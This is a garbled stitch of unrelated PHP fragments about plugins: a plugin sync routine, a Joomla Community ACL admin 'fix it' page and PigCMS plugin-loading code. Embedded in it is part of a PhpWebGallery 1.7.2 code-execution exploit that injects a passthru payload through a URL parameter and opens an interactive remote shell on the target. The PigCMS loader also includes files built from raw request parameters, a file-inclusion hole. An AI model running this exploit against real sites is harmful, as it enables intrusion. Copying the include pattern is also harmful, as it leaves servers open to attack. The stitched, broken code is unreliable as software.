function syn_plugins()
{
global $db, $tpf;
$dirs = scandir(PD_PLUGINS_DIR);
sort($dirs);
for ($i = 0; $i < count($dirs); $i++) {
if (check_plugin($dirs[$i])) {
$arr[] = $dirs[$i];
}
}
if (count($arr)) {
$q = $db->query("select * from {$tpf}plugins where actived=1");
while ($rs = $db->fetch_array($q)) {
if (check_plugin($rs['plugin_name'])) {
$active_plugins .= $rs['plugin_name'] . ',';
$active_time[$rs['plugin_name']] = $rs['action_time'];
$plugin_in_shortcut[$rs['plugin_name']] = $rs['in_shortcut'];
}
}
$db->free($q);
unset($rs);
if (trim(substr($active_plugins, 0, -1))) {
$active_arr = explode(',', $active_plugins);
}
for ($i = 0; $i < count($arr); $i++) {
if (@in_array($arr[$i], $active_arr)) {
$sql_do .= "('" . $db->escape($arr[$i]) . "','1','" . $active_time[$arr[$i]] . "','" . $plugin_in_shortcut[$arr[$i]] . "'),";
} else {
$sql_do .= "('" . $db->escape($arr[$i]) . "','0','0','0'),";
}
}
$sql_do = substr($sql_do, 0, -1);
$db->query_unbuffered("truncate table {$tpf}plugins;");
$db->query_unbuffered("replace into {$tpf}plugins(plugin_name,actived,action_time,in_shortcut) values {$sql_do} ;");
return true;
}
}
$error = true;
$sysmsg[] = $ids_arr[1];
} else {
$plugin_ids = $ids_arr[1];
}
if (!$error) {
$db->query_unbuffered("update {$tpf}plugins set actived=0 where plugin_name in({$plugin_ids})");
$sysmsg[] = __('plugins_inactived_success');
redirect($_SERVER['HTTP_REFERER'], $sysmsg);
} else {
redirect('back', $sysmsg);
}
} else {
syn_plugins();
$sql_do = "";
$perpage = 10;
$rs = $db->fetch_one_array("select count(*) as total_num from {$tpf}plugins {$sql_do}");
$total_num = $rs['total_num'];
$start_num = ($pg - 1) * $perpage;
$q = $db->query("select * from {$tpf}plugins {$sql_do} order by actived desc, plugin_name asc limit {$start_num},{$perpage}");
while ($rs = $db->fetch_array($q)) {
if (check_plugin($rs['plugin_name'])) {
$plugins_arr[] = get_plugin_info($rs['plugin_name']);
}
}
$db->free($q);
unset($rs);
$page_nav = multi($total_num, $perpage, $pg, urr(ADMINCP, "item={$item}&menu=plugin&action={$action}"));
require_once template_echo($item, $admin_tpl_dir, '', 1);
}
}
}
print "\n+---------------------------------------------------------------------------+";
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------------+\n";
if ($argc < 3) {
print "\nUsage...: php {$argv['0']} host path [sid]\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to PhpWebGallery directory";
print "\nsid.....: a valid admin session id\n";
die;
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = isset($argv[3]) ? $argv[3] : get_sid();
check_plugin();
$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
print "\nphpwebgallery-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit") {
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
} else {
break;
}
function fixIt()
{
global $mainframe;
$mode = JRequest::getCmd('mode');
$code = (int) JRequest::getCmd('code');
$db =& JFactory::getDBO();
if ($mode == 'cb') {
$code = check_cb_plugin();
if ($code == 0) {
//not enabled
$query = "UPDATE `#__comprofiler_plugin` SET `published` = 1 WHERE `element` = 'cacl_usersync'";
$db->setQuery($query);
if ($db->query()) {
$mainframe->redirect('index.php?option=com_community_acl&task=about', JText::_('Community ACL CB plugin enabled successfully.'));
die;
} else {
JError::raiseError(500, $row->getError());
}
} elseif ($code == -1) {
//not installed
$path_src = JPATH_SITE . '/administrator/components/com_community_acl/plug_cbcacl_usersync';
$path_dst = JPATH_SITE . '/components/com_comprofiler/plugin/user/plug_caclplugin';
$msg = '';
$result = @mkdir(JPATH_SITE . "/components/com_comprofiler/plugin/user/plug_caclplugin");
if ($result) {
$result = @chmod(JPATH_SITE . "/components/com_comprofiler/plugin/user/plug_caclplugin", 0777);
} else {
$msg .= 'Error: Unable create dir `.../components/com_comprofiler/plugin/user/plug_caclplugin`<br/>';
}
if ($result) {
$result = @copy($path_src . "/cacl_usersync.php", $path_dst . "/cacl_usersync.php");
} else {
$msg .= 'Error: Unable chmod dir `.../components/com_comprofiler/plugin/user/plug_caclplugin`<br/>';
}
if ($result) {
$result = @copy($path_src . "/cacl_usersync.xml", $path_dst . "/cacl_usersync.xml");
} else {
$msg .= 'Error: Unable copy file `.../administrator/components/com_community_acl/plug_caclplugin/cacl_usersync.php`<br/>';
}
if ($result) {
$result = @chmod(JPATH_SITE . "/components/com_comprofiler/plugin/user/plug_caclplugin", 0775);
} else {
$msg .= 'Error: Unable copy file `.../components/com_comprofiler/plugin/user/plug_caclplugin/cacl_usersync.xml`<br/>';
}
if (!$result) {
$msg .= 'Error: Unable chmod dir `.../components/com_comprofiler/plugin/user/plug_caclplugin`><br/>';
}
if ($result) {
$db->setQuery("DELETE FROM `#__comprofiler_plugin` WHERE `element` = 'cacl_usersync';");
$db->query();
$db->setQuery("INSERT INTO `#__comprofiler_plugin` ( `id` , `name` , `element` , `type` , `folder` , `backend_menu` , `access` , `ordering` , `published` , `iscore` , `client_id` , `checked_out` , `checked_out_time` , `params` ) VALUES ('', 'cACL plugin', 'cacl_usersync', 'user', 'plug_caclplugin', '', '0', '0', '1', '0', '0', '0', '0000-00-00 00:00:00', '');");
$db->query();
if ($db->getErrorNum()) {
$msg .= 'Error: ' . $db->stderr() . '<br/>';
}
}
if ($msg == '') {
$mainframe->redirect('index.php?option=com_community_acl&task=about', JText::_('Community ACL CB plugin installed successfully.'));
die;
} else {
$mainframe->redirect('index.php?option=com_community_acl&task=about', $msg, 'error');
}
}
} elseif ($mode == 'joomla') {
$code = check_plugin();
if ($code == 0) {
//not enabled
$query = "UPDATE `#__plugins` SET `published` = 1 WHERE `element` = 'community_acl'";
$db->setQuery($query);
if ($db->query()) {
$mainframe->redirect('index.php?option=com_community_acl&task=about', JText::_('Community ACL Joomla plugin enabled successfully.'));
die;
} else {
JError::raiseError(500, $row->getError());
}
} elseif ($code == -1) {
//not installed
$msg = '';
$result = @chmod(JPATH_SITE . "/administrator/components/com_community_acl/joomla_plugin/community_acl.php", 0666);
/* * /
if ($result)
$result = @chmod (JPATH_SITE. "/administrator/components/com_community_acl/joomla_plugin/community_acl.xml", 0666);
else
$msg .= 'Error: Unable chmod file `.../administrator/components/com_community_acl/joomla_plugin/community_acl.php`<br/>';
if ($result)
$result = @copy( JPATH_SITE. "/administrator/components/com_community_acl/joomla_plugin/community_acl.php", JPATH_SITE."/plugins/system/community_acl.php");
else
$msg .= 'Error: Unable chmod file `.../administrator/components/com_community_acl/joomla_plugin/community_acl.xml`<br/>';
if ($result)
$result = @copy( JPATH_SITE. "/administrator/components/com_community_acl/joomla_plugin/community_acl.xml", JPATH_SITE."/plugins/system/community_acl.xml");
else
$msg .= 'Error: Unable copy file `.../administrator/components/com_community_acl/joomla_plugin/community_acl.php`<br/>';
if ($result) {
$result = @copy( JPATH_SITE. "/administrator/components/com_community_acl/joomla_plugin/en-GB.plg_system_community_acl.ini", JPATH_SITE."/administrator/language/en-GB/en-GB.plg_system_community_acl.ini");
$result = @copy( JPATH_SITE. "/administrator/components/com_community_acl/joomla_plugin/en-GB.plg_system_community_acl.ini", JPATH_SITE."/language/en-GB/en-GB.plg_system_community_acl.ini");
} else
$msg .= 'Error: Unable copy file `.../administrator/components/com_community_acl/joomla_plugin/community_acl.xml`<br/>';
if (!$result)
$msg .= 'Error: Unable copy file `.../administrator/components/com_community_acl/joomla_plugin/en-GB.plg_system_community_acl.ini`<br/>';
if ($result) {
$db->setQuery("DELETE FROM `#__plugins` WHERE `element` = 'community_acl'");
$db->query();
$db->setQuery( "INSERT INTO `#__plugins` (`name`, `element`, `folder`, `access`, `ordering`, `published`, `iscore`, `client_id`, `checked_out`, `checked_out_time`, `params`) VALUES('System - Community ACL', 'community_acl', 'system', 0, 9, 1, 0, 0, 0, '0000-00-00 00:00:00', '')");
$db->query();
if ($db->getErrorNum()) {
$msg .= 'Error: '. $db->stderr() .'<br/>';
}
}
if ($msg == '') {
$mainframe->redirect('index.php?option=com_community_acl&task=about', JText::_('Community ACL Joomla plugin installed successfully.'));
die;
} else {
$mainframe->redirect('index.php?option=com_community_acl&task=about', $msg, 'error');
}
/* */
}
} elseif ($mode == 'hack') {
switch ($code) {
case 1:
$dst_file = JPATH_SITE . "/administrator/modules/mod_menu/helper.php";
$src_file = JPATH_SITE . "/administrator/components/com_community_acl/patch/mod_menu_helper.php";
$bk_file = JPATH_SITE . "/administrator/components/com_community_acl/backup/mod_menu_helper.php";
$success_msg = 'File `' . $dst_file . '` successfully replaced by patched version.';
break;
case 2:
$dst_file = JPATH_SITE . "/modules/mod_mainmenu/helper.php";
$src_file = JPATH_SITE . "/administrator/components/com_community_acl/patch/mod_mainmenu_helper.php";
$bk_file = JPATH_SITE . "/administrator/components/com_community_acl/backup/mod_mainmenu_helper.php";
$success_msg = 'File `' . $dst_file . '` successfully replaced by patched version.';
break;
case 3:
$dst_file = JPATH_SITE . "/modules/mod_mainmenu/legacy.php";
$src_file = JPATH_SITE . "/administrator/components/com_community_acl/patch/legacy.php";
$bk_file = JPATH_SITE . "/administrator/components/com_community_acl/backup/legacy.php";
$success_msg = 'File `' . $dst_file . '` successfully replaced by patched version.';
break;
case 4:
$dst_file = JPATH_SITE . "/libraries/joomla/application/module/helper.php";
$src_file = JPATH_SITE . "/administrator/components/com_community_acl/patch/module_helper.php";
$bk_file = JPATH_SITE . "/administrator/components/com_community_acl/backup/module_helper.php";
$success_msg = 'File `' . $dst_file . '` successfully replaced by patched version.';
break;
}
$msg = '';
$result = @chmod($dst_file, 0666);
/* * /
if ($result) {
@unlink($bk_file);
$result = @rename($dst_file, $bk_file);
} else
$msg .= 'Error: Unable chmod file `'.$dst_file.'`<br/>';
if ($result) {
$result = @copy($src_file, $dst_file);
} else
$msg .= 'Error: Unable backup file `'.$dst_file.'`<br/>';
if (!$result)
$msg .= 'Error: Unable patch(replace) file `'.$dst_file.'`<br/>';
/* */
if ($msg == '') {
$mainframe->redirect('index.php?option=com_community_acl&task=about', $success_msg);
die;
}
/* else {
$mainframe->redirect('index.php?option=com_community_acl&task=about', $msg, 'error');
}*/
}
$mainframe->redirect('index.php?option=com_community_acl&task=about');
}
function hacks()
{
left_menu_header();
$not_writable = '';
?>
<table border="1" width="100%" style="background-color: #F7F8F9; border: solid 1px #d5d5d5; width: 100%; padding: 10px; border-collapse: collapse;">
<?php
$msg = '';
# - Kobby Sam: Eliminate the check for Community Builder
$cb_code = check_cb_plugin();
switch ($cb_code) {
case -3:
$msg .= 'Community Builder is not detected. Please install Community Builder ver 1.1 or above and then install cACL plugin for Community Builder.';
break;
case -2:
$msg .= 'Incorrect version of Community Builder. Please install Community Builder ver 1.1 or above and then install cACL plugin for Community Builder.';
break;
case -1:
$msg .= 'Community ACL plugin for Community Builder is not installed.';
break;
case 0:
$msg .= 'Community ACL plugin for Community Builder is installed, but not enabled.';
break;
}
if ($cb_code < 1) {
?>
<!--// <tr>
<td align="center" width="85"><?php
if ($cb_code > -2) {
?>
<input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=cb&code=<?php
echo $cb_code;
?>
'" /><?php
}
?>
</td><td style="width:auto;"><?php
echo $msg;
?>
</td>
</tr> //-->
<?php
}
$msg = '';
$j_code = check_plugin();
switch ($j_code) {
case -1:
$msg .= 'Community ACL plugin for Joomla! is not installed.<br/>';
break;
case 0:
$msg .= 'Community ACL plugin for Joomla! is installed, but not enabled.<br/>';
break;
}
if ($j_code < 1) {
?>
<tr>
<td align="center" width="85"><input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=joomla&code=<?php
echo $j_code;
?>
'" /></td><td style="width:auto;"><?php
echo $msg;
?>
</td>
</tr>
<?php
}
$mod_menu_helper = check_core_file(JPATH_SITE . DS . 'administrator' . DS . 'modules' . DS . 'mod_menu' . DS . 'helper.php');
$not_writable = '';
if ($mod_menu_helper < 1) {
?>
<tr>
<td align="center" width="85">
<?php
if ($mod_menu_helper == 0) {
?>
<input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=hack&code=1'" />
<?php
} else {
$not_writable = '<br/>The `' . JPATH_SITE . DS . 'administrator' . DS . 'modules' . DS . 'mod_menu' . DS . 'helper.php' . '` file is <font color="#FF0000">not writable</font>. Please make it writable or manually replace the `' . JPATH_SITE . DS . 'administrator' . DS . 'modules' . DS . 'mod_menu' . DS . 'helper.php' . '` file with `' . JPATH_SITE . DS . 'administrator' . DS . 'components' . DS . 'com_community_acl' . DS . 'patch' . DS . 'mod_menu_helper.php`.';
?>
<font color="#FF0000" style="font-weight:bold;">NOT WRITABLE!</font>
<?php
}
?>
</td><td style="width:auto;"><?php
echo 'Community ACL core hack in the `' . JPATH_SITE . DS . 'administrator' . DS . 'modules' . DS . 'mod_menu' . DS . 'helper.php' . '` file is not detected.' . $not_writable;
?>
</td>
</tr>
<?php
}
$mod_mainmenu_helper = check_core_file(JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'helper.php');
$not_writable = '';
if ($mod_mainmenu_helper < 1) {
?>
<tr>
<td align="center" width="85">
<?php
if ($mod_mainmenu_helper == 0) {
?>
<input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=hack&code=2'" />
<?php
} else {
$not_writable = '<br/>The `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'helper.php' . '` file is <font color="#FF0000">not writable</font>. Please make it writable or manually replace the `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'helper.php' . '` file with `' . JPATH_SITE . DS . 'administrator' . DS . 'components' . DS . 'com_community_acl' . DS . 'patch' . DS . 'mod_mainmenu_helper.php`.';
?>
<font color="#FF0000" style="font-weight:bold;">NOT WRITABLE!</font>
<?php
}
?>
</td><td style="width:auto;"><?php
echo 'Community ACL core hack in the `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'helper.php' . '` file is not detected.' . $not_writable;
?>
</td>
</tr>
<?php
}
$mod_mainmenu_legacy = check_core_file(JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'legacy.php');
$not_writable = '';
if ($mod_mainmenu_legacy < 1) {
?>
<tr>
<td align="center" width="85">
<?php
if ($mod_mainmenu_legacy == 0) {
?>
<input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=hack&code=3'" />
<?php
} else {
$not_writable = '<br/>The `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'legacy.php' . '` file is <font color="#FF0000">not writable</font>. Please make it writable or manually replace the `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'legacy.php' . '` file with `' . JPATH_SITE . DS . 'administrator' . DS . 'components' . DS . 'com_community_acl' . DS . 'patch' . DS . 'legacy.php`.';
?>
<font color="#FF0000" style="font-weight:bold;">NOT WRITABLE!</font>
<?php
}
?>
</td><td style="width:auto;"><?php
echo 'Community ACL core hack in the `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'legacy.php' . '` file is not detected.' . $not_writable;
?>
</td>
</tr>
<?php
}
$module_helper = check_core_file(JPATH_SITE . DS . 'libraries' . DS . 'joomla' . DS . 'application' . DS . 'module' . DS . 'helper.php');
$not_writable = '';
if ($module_helper < 1) {
?>
<tr>
<td align="center" width="85">
<?php
if ($module_helper == 0) {
?>
<input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=hack&code=4'" />
<?php
} else {
$not_writable = '<br/>The `' . JPATH_SITE . DS . 'libraries' . DS . 'joomla' . DS . 'application' . DS . 'module' . DS . 'helper.php' . '` file is <font color="#FF0000">not writable</font>. Please make it writable or manually replace the `' . JPATH_SITE . DS . 'libraries' . DS . 'joomla' . DS . 'application' . DS . 'module' . DS . 'helper.php' . '` file with `' . JPATH_SITE . DS . 'administrator' . DS . 'components' . DS . 'com_community_acl' . DS . 'patch' . DS . 'module_helper.php`.';
?>
<font color="#FF0000" style="font-weight:bold;">NOT WRITABLE!</font>
<?php
}
?>
</td><td style="width:auto;"><?php
echo 'Community ACL core hack in the `' . JPATH_SITE . DS . 'libraries' . DS . 'joomla' . DS . 'application' . DS . 'module' . DS . 'helper.php' . '` file is not detected.' . $not_writable;
?>
</td>
</tr>
<?php
}
?>
</table><br />
<?php
left_menu_footer();
}
foreach ($_GET as &$get_value) {
$get_value = htmlspecialchars(str_replace(array('<', '>', '\'', '"', '(', ')'), '', $get_value));
}
doStripslashes();
$_G['system'] = require_file(PIGCMS_PATH . 'config/config.php');
$config = F('config');
if (empty($config)) {
$configs = D('Config')->field('`name`,`value`')->select();
foreach ($configs as $key => $value) {
$config[$value['name']] = $value['value'];
}
F('config', $config);
}
$_G['config'] = $config;
defined('TPL_PATH') || define('TPL_PATH', PIGCMS_PATH . 'template/');
defined('TPL_URL') || define('TPL_URL', !IS_SUB_DIR ? $config['site_url'] . '/template/' . GROUP_NAME . '/' . $_G['config']['theme_' . GROUP_NAME . '_group'] . '/' : $config['site_url'] . '/template/' . GROUP_NAME . '/' . $config['theme_' . GROUP_NAME . '_group'] . '/');
$_G['plugins'] = array();
if (!empty($_G['config']['active_plugins'])) {
$active_plugins = json_decode($_G['config']['active_plugins'], true);
if (is_array($active_plugins)) {
foreach ($active_plugins as $plugin) {
if (check_plugin($plugin) === true) {
$_G['plugins'][$plugin] = true;
}
}
}
}
if (USE_FRAMEWORK == true) {
R(GROUP_NAME, MODULE_NAME, ACTION_NAME);
echo ob_get_clean();
}
<?php
define('PIGCMS_PATH', dirname(__FILE__) . '/');
require_once PIGCMS_PATH . 'source/init.php';
if (check_plugin($_GET['plugin'])) {
if (!empty($_GET['do_plugin_file'])) {
include PIGCMS_PATH . 'source/plugins/' . $_GET['plugin'] . '/' . $_GET['plugin'] . '_' . $_GET['do_plugin_file'] . '.php';
} else {
include PIGCMS_PATH . 'source/plugins/' . $_GET['plugin'] . '/' . $_GET['plugin'] . '.php';
}
} else {
pigcms_tips('站点未开启插件: <b>' . $_GET['plugin'] . '</b>');
}
echo ob_get_clean();
